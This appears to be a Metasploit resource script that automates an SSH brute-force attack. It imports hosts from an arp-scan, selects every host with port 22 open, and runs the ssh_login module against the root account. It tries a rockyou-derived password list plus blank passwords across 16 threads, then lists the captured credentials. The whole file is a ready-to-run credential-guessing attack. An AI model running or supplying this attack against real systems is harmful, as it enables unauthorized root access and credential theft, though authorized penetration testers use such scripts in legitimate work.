workspace AUTOSCAN
db_import arp-scan.xml
services -p 22 -u -R
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE rockyou_short.txt
set BLANK_PASSWORDS True
set STOP_ON_SUCCESS True
set USERNAME root
set THREADS 16
run
creds